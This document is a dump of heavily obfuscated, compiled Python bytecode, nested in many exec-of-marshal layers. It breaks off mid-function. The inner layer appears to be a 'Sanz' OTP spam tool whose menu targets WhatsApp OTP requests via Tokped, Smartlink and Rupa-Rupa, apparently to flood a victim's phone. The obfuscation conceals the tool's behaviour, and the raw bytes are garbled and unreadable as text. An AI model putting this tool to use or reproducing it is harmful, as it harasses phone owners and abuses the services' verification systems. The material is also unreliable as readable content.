\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb0?\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@
\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns*?\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa4>\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x1e>\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x98=\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x12=\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8c<\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x06<\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x80;\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfa:\x00\x00\xe3\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nst:\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xee9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsh9\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe28\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\\8\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd67\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsP7\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xca6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x0
1\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsD6\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xbe5\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns85\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xb24\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns,4\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa63\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns 
3\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x9a2\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x142\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x8e1\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x081\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x820\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xfc/\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsv/\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf0.\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\x
a0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsj.\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe4-\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns^-\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xd8,\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00@\x00\x00\x00sf\x01\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x02l\x00m\x06Z\x06\x01\x00d\x00d\x03l\x07m\x08Z\x08\x01\x00d\x04Z\td\x05Z\nd\x06Z\x0bd\x07Z\x0cd\x08Z\rd\tZ\x0ed\nZ\x0fd\x0bZ\x10d\x0cZ\x11d\rZ\x12d\x0ed\x0f\x84\x00Z\x13d\x10d\x11\x84\x00Z\x14d\x12d\x13\x84\x00Z\x15d\x14d\x15\x84\x00Z\x16d\x16d\x17\x84\x00Z\x17d\x18d\x19\x84\x00Z\x18d\x1ad\x1b\x84\x00Z\x19d\x1cd\x1d\x84\x00Z\x1az\x14e\x1bd\x1ed\x1f\x83\x02Z\x1ce\x17\x83\x00\x01\x00W\x00n\x9c\x04\x00e\x1de\x1ef\x02k\n\x90\x01r"\x01\x00\x01\x00\x01\x00e\x02\xa0\x1fd \xa1\x01\x01\x00e\x02\xa0\x1fd!\xa1\x01\x01\x00e\x04\xa0 
d"\xa1\x01\x01\x00d#Z!e\x1bd\x1ed$\x83\x02Z"e"\xa0#e!\xa1\x01\x01\x00e"\xa0$\xa1\x00\x01\x00e\x17\x83\x00\x01\x00Y\x00n@\x04\x00e%k\n\x90\x01r`\x01\x00\x01\x00\x01\x00e&e\x12d%\x17\x00e\x0f\x17\x00d&\x17\x00e\x12\x17\x00d\'\x17\x00e\x0f\x17\x00d(\x17\x00\x83\x01\x01\x00e\x14\x83\x00\x01\x00Y\x00n\x02X\x00d\x01S\x00))\xe9\x00\x00\x00\x00N)\x01\xda\x04post)\x01\xda\x0fConnectionErrorz\x07\x1b[1;92mz\x07\x1b[1;96mz\x07\x1b[1;93mz\x07\x1b[1;95mz\x07\x1b[1;97mz\x07\x1b[1;94mz\x07\x1b[1;91mz\x07\x1b[1;30mz\x07\x1b[4;92mz\x04\x1b[0mc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s2\x00\x00\x00|\x00d\x01\x17\x00D\x00]$}\x01t\x00j\x01\xa0\x02|\x01\xa1\x01\x01\x00t\x00j\x01\xa0\x03\xa1\x00\x01\x00t\x04\xa0\x05d\x02\xa1\x01\x01\x00q\x08d\x00S\x00)\x03N\xda\x01\ng\xfc\xa9\xf1\xd2MbP?)\x06\xda\x03sys\xda\x06stdout\xda\x05write\xda\x05flush\xda\x04time\xda\x05sleep)\x02\xda\x01s\xda\x01x\xa9\x00r\r\x00\x00\x00\xfa\x06<Sanz>\xda\x03run\x10\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01r\x0f\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s:\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02t\x03d\x02\x17\x00t\x04\x17\x00d\x03\x17\x00t\x03\x17\x00d\x04\x17\x00t\x04\x17\x00d\x05\x17\x00\x83\x01\x01\x00t\x05\xa0\x06\xa1\x00\x01\x00d\x00S\x00)\x06N\xe7\x00\x00\x00\x00\x00\x00\xe0?\xfa\x01[\xfa\x01!\xfa\x02] 
\xda\x04Exit)\x07r\t\x00\x00\x00r\n\x00\x00\x00\xda\x05print\xda\x01p\xda\x01mr\x05\x00\x00\x00\xda\x04exitr\r\x00\x00\x00r\r\x00\x00\x00r\r\x00\x00\x00r\x0e\x00\x00\x00\xda\x06keluar\x16\x00\x00\x00s\x06\x00\x00\x00\x00\x01\n\x01$\x01r\x19\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xe2\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02\xa0\x03d\x02\xa1\x01\x01\x00t\x04t\x05d\x03\x17\x00\x83\x01\x01\x00t\x06t\x07d\x04\x17\x00t\x08\x17\x00d\x05\x17\x00t\x07\x17\x00d\x06\x17\x00t\t\x17\x00d\x07\x17\x00t\x07\x17\x00d\x04\x17\x00t\n\x17\x00d\x08\x17\x00t\x07\x17\x00d\t\x17\x00t\x08\x17\x00d\n\x17\x00t\x0b\x17\x00\x83\x01}\x00|\x00d\x0bk\x02sx|\x00d\x0ck\x02r\x8at\x02\xa0\x03d\x02\xa1\x01\x01\x00t\x0c\x83\x00\x01\x00nT|\x00d\rk\x02s\x9a|\x00d\x0ek\x02r\xa2t\r\x83\x00\x01\x00n<t\x0et\x07d\x04\x17\x00t\x08\x17\x00d\x0f\x17\x00t\x07\x17\x00d\x06\x17\x00t\x08\x17\x00d\x10\x17\x00t\x08\x17\x00d\x11\x17\x00\x83\x01\x01\x00t\x02\xa0\x03d\x02\xa1\x01\x01\x00t\x0f\x83\x00\x01\x00d\x00S\x00)\x12N\xfa)xdg-open https://youtube.com/SanzSoekamti\xe9\x01\x00\x00\x00\xf5\x84\x00\x00\x00\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80r\x11\x00\x00\x00\xfa\x01?r\x13\x00\x00\x00z\x0fMau Spam Lagi? 
z\x03y/n\xfa\x01]\xfa\x02: \xda\x01y\xda\x01Y\xda\x01n\xda\x01Nr\x12\x00\x00\x00\xfa\x0bWrong Input\xfa\x02!!)\x10\xda\x02os\xda\x06systemr\t\x00\x00\x00r\n\x00\x00\x00r\x0f\x00\x00\x00\xda\x01b\xda\x05inputr\x16\x00\x00\x00r\x17\x00\x00\x00\xda\x01u\xda\x02bi\xda\x01h\xda\x04spamr\x19\x00\x00\x00r\x15\x00\x00\x00\xda\x04lagi)\x01\xda\x01lr\r\x00\x00\x00r\r\x00\x00\x00r\x0e\x00\x00\x00r.\x00\x00\x00\x1b\x00\x00\x00s\x18\x00\x00\x00\x00\x01\n\x00\n\x01\x0c\x01H\x01\x10\x01\n\x00\x08\x01\x10\x01\x08\x02,\x01\n\x01r.\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00C\x00\x00\x00sF\x01\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02t\x01\x9b\x00d\x03t\x02\x9b\x00d\x04t\x01\x9b\x00d\x01t\x02\x9b\x00d\x05\x9d\x0c\x83\x01\x01\x00t\x00t\x01\x9b\x00d\x06t\x02\x9b\x00d\x07t\x01\x9b\x00d\x08t\x02\x9b\x00d\tt\x01\x9b\x00d\nt\x02\x9b\x00d\x0b\x9d\x0c\x83\x01\x01\x00t\x00t\x01\x9b\x00d\x0ct\x02\x9b\x00d\rt\x01\x9b\x00d\x0et\x02\x9b\x00d\x0ft\x01\x9b\x00d\x10t\x02\x9b\x00d\x11t\x03\x9b\x00d\x12\x9d\x0e\x83\x01\x01\x00t\x00t\x04d\x13\x17\x00\x83\x01\x01\x00t\x00t\x05d\x14\x17\x00t\x06\x17\x00d\x15\x17\x00t\x05\x17\x00d\x16\x17\x00t\x03\x17\x00d\x17\x17\x00t\x01\x17\x00d\x18\x17\x00t\x07\x17\x00d\x19\x17\x00\x83\x01\x01\x00t\x00t\x05d\x14\x17\x00t\x06\x17\x00d\x15\x17\x00t\x05\x17\x00d\x16\x17\x00t\x03\x17\x00d\x1a\x17\x00t\x01\x17\x00d\x18\x17\x00t\x07\x17\x00d\x1b\x17\x00\x83\x01\x01\x00t\x00t\x05d\x14\x17\x00t\x06\x17\x00d\x15\x17\x00t\x05\x17\x00d\x16\x17\x00t\x03\x17\x00d\x1c\x17\x00t\x01\x17\x00d\x18\x17\x00t\x08\x17\x00d\x1d\x17\x00t\x05\x17\x00\x83\x01\x01\x00t\x00t\x04d\x13\x17\x00\x83\x01\x01\x00d\x00S\x00)\x1eNu\t\x00\x00\x00\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90u\x1c\x00\x00\x00\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90 u\x07\x00\x00\x00\xe2\x94\xac \xe2\x94\xacu"\x00\x00\x00\xe2\x94\xac 
\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90u\x12\x00\x00\x00\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90u\t\x00\x00\x00\xe2\x94\x94\xe2\x94\x80\xe2\x94\x90u\x1c\x00\x00\x00\xe2\x94\x9c\xe2\x94\x80\xe2\x94\x98\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x82\xe2\x94\x82\xe2\x94\x82 u\t\x00\x00\x00\xe2\x94\x82\xe2\x94\x82\xe2\x94\x82u \x00\x00\x00\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4 \xe2\x94\x82 \xe2\x94\x94\xe2\x94\x80\xe2\x94\x90u\t\x00\x00\x00\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4u\x12\x00\x00\x00\xe2\x94\x9c\xe2\x94\x80\xe2\x94\x98\xe2\x94\x9c\xe2\x94\x80\xe2\x94\x98u\t\x00\x00\x00\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98u\x14\x00\x00\x00\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4 \xe2\x94\xb4 u\t\x00\x00\x00\xe2\x94\x94\xe2\x94\xb4\xe2\x94\x98u\x1c\x00\x00\x00\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x94\xb4 \xe2\x94\x94\xe2\x94\x80\xe2\x94\x98u\x07\x00\x00\x00\xe2\x94\xb4 \xe2\x94\xb4u\r\x00\x00\x00\xe2\x94\xb4 \xe2\x94\xb4 |> z\x04V2.0r\x1c\x00\x00\x00r\x11\x00\x00\x00\xf5\x03\x00\x00\x00\xe2\x80\xa2r\x13\x00\x00\x00z\x08Author r\x1f\x00\x00\x00\xda\x04Sanzz\x08Youtube z\rSANZ SOEKAMTIz\x08Github 
z\x1ehttps://github.com/B4N954N2-ID)\tr\x0f\x00\x00\x00r\x17\x00\x00\x00\xda\x02pu\xda\x01kr(\x00\x00\x00r\x16\x00\x00\x00r,\x00\x00\x00r+\x00\x00\x00\xda\x02hgr\r\x00\x00\x00r\r\x00\x00\x00r\r\x00\x00\x00r\x0e\x00\x00\x00\xda\x04logo(\x00\x00\x00s\x10\x00\x00\x00\x00\x01,\x01,\x012\x01\x0c\x014\x014\x018\x01r5\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00!\x00\x00\x00C\x00\x00\x00s\xac\x01\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02\x83\x00\x01\x00t\x03t\x04\x9b\x00d\x02t\x05\x9b\x00d\x03t\x04\x9b\x00d\x04t\x06\x9b\x00d\x05t\x04\x9b\x00d\x02t\x05\x9b\x00d\x06t\x04\x9b\x00d\x04t\x06\x9b\x00d\x07t\x04\x9b\x00d\x02t\x05\x9b\x00d\x08t\x04\x9b\x00d\x04t\x06\x9b\x00d\tt\x04\x9b\x00d\x02t\x05\x9b\x00d\nt\x04\x9b\x00d\x04t\x06\x9b\x00d\x0b\x9d \x83\x01\x01\x00t\x03t\x07d\x0c\x17\x00\x83\x01\x01\x00z\x0et\x08\xa0\td\r\xa1\x01\x01\x00W\x00n>\x04\x00t\nk\nr\xd0\x01\x00\x01\x00\x01\x00t\x0bt\x04d\x02\x17\x00t\x0c\x17\x00d\x0e\x17\x00t\x04\x17\x00d\x0f\x17\x00t\x0c\x17\x00d\x10\x17\x00\x83\x01\x01\x00t\r\x83\x00\x01\x00Y\x00n\x02X\x00t\x0et\x04\x9b\x00d\x02t\x05\x9b\x00d\x11t\x04\x9b\x00d\x0ft\x0f\x9b\x00d\x12t\x0c\x9b\x00d\x13t\x05\x9b\x00\x9d\x0b\x83\x01}\x00|\x00d\x14k\x02\x90\x01s\x10|\x00d\x03k\x02\x90\x01r\x18t\x10\x83\x00\x01\x00n\x90|\x00d\x15k\x02\x90\x01s,|\x00d\x06k\x02\x90\x01r4t\x11\x83\x00\x01\x00nt|\x00d\x16k\x02\x90\x01sH|\x00d\x08k\x02\x90\x01rPt\x12\x83\x00\x01\x00nX|\x00d\x17k\x02\x90\x01sd|\x00d\nk\x02\x90\x01rlt\r\x83\x00\x01\x00n<t\x0bt\x04d\x02\x17\x00t\x0c\x17\x00d\x0e\x17\x00t\x04\x17\x00d\x0f\x17\x00t\x0c\x17\x00d\x18\x17\x00t\x0c\x17\x00d\x19\x17\x00\x83\x01\x01\x00t\x13\xa0\x14d\x1a\xa1\x01\x01\x00t\x15\x83\x00\x01\x00d\x00S\x00)\x1bN\xda\x05clearr\x11\x00\x00\x00Z\x0201z\x03]. 
z\x13Spam Wa Otp Tokped\nZ\x0202z\x16Spam Wa Otp Smartlink\nZ\x0203z\x16Spam Wa Otp Rupa-Rupa\nZ\x0204r\x14\x00\x00\x00r\x1c\x00\x00\x00z\x12https://google.comr\x12\x00\x00\x00r\x13\x00\x00\x00\xfa\x15Check Your Connectionr0\x00\x00\x00z\x07Choose r\x1f\x00\x00\x00\xda\x011\xda\x012\xda\x013\xda\x014r$\x00\x00\x00r%\x00\x00\x00r\x1b\x00\x00\x00)\x16r&\x00\x00\x00r\'\x00\x00\x00r5\x00\x00\x00r\x0f\x00\x00\x00r\x16\x00\x00\x00r,\x00\x00\x00r*\x00\x00\x00r(\x00\x00\x00\xda\x08requests\xda\x03getr\x03\x00\x00\x00r\x15\x00\x00\x00r\x17\x00\x00\x00r\x19\x00\x00\x00r)\x00\x00\x00r2\x00\x00\x00\xda\x06tokped\xda\tsmartlink\xda\x05rupa2r\t\x00\x00\x00r\n\x00\x00\x00r-\x00\x00\x00)\x01Z\x04sanzr\r\x00\x00\x00r\r\x00\x00\x00r\x0e\x00\x00\x00r-\x00\x00\x002\x00\x00\x00s*\x00\x00\x00\x00\x01\n\x00\x06\x01h\x01\x0c\x01\x02\x00\x0e\x01\x0e\x00$\x00\x0c\x01*\x01\x14\x01\x08\x01\x14\x01\x08\x01\x14\x01\x08\x01\x14\x01\x08\x02,\x00\n\x01r-\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x12\x00\x00\x00C\x00\x00\x00s\x8a\x04\x00\x00\x90\x02z\xf2t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02\xa0\x03d\x02\xa1\x01\x01\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x04\x83\x00\x01\x00t\x05t\x06d\x03\x17\x00t\x07\x17\x00d\x04\x17\x00t\x06\x17\x00d\x05\x17\x00t\x08\x17\x00d\x06\x17\x00t\t\x17\x00d\x07\x17\x00t\x06\x17\x00d\x08\x17\x00\x83\x01\x01\x00t\nt\x06d\x03\x17\x00t\x07\x17\x00d\x04\x17\x00t\x06\x17\x00d\x05\x17\x00t